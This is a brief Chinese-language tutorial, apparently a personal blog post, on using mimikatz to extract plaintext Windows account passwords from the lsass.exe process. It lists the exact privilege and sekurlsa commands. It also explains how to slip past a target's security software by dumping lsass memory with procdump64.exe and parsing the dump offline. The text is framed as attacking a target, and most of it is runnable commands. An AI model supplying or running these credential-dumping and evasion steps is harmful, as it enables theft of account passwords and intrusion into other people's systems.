mimikatz 是一款windows平台下的神器,它具備很多功能,我認為最牛逼的是lsass.exe進程中獲取windows的賬號明文密碼,當然他的其他功能也很強大。是在下才疏學淺,沒有精通。
mimikatz獲取密碼
安裝 mimikatz_trunk
以管理員身份運行
命令如下:
privilege::debug
sekurlsa::logonpasswords
>在對目標進行攻擊的時候,對方有安全軟件的情況下可以先安裝procdump64.exe,獲取到 lsass.dmp 文件,然后在自己的環境下運行mimikatz這樣就獲取到目標密碼。
安裝procdump64.exe
這是微軟自己的工具所以不會存在任何異常所以放心使用
命令如下:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
獲取到 lsass.dmp文件后可以用
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
來獲取明文密碼,最后的exit是運行完成之后停止,不然會一直運行下去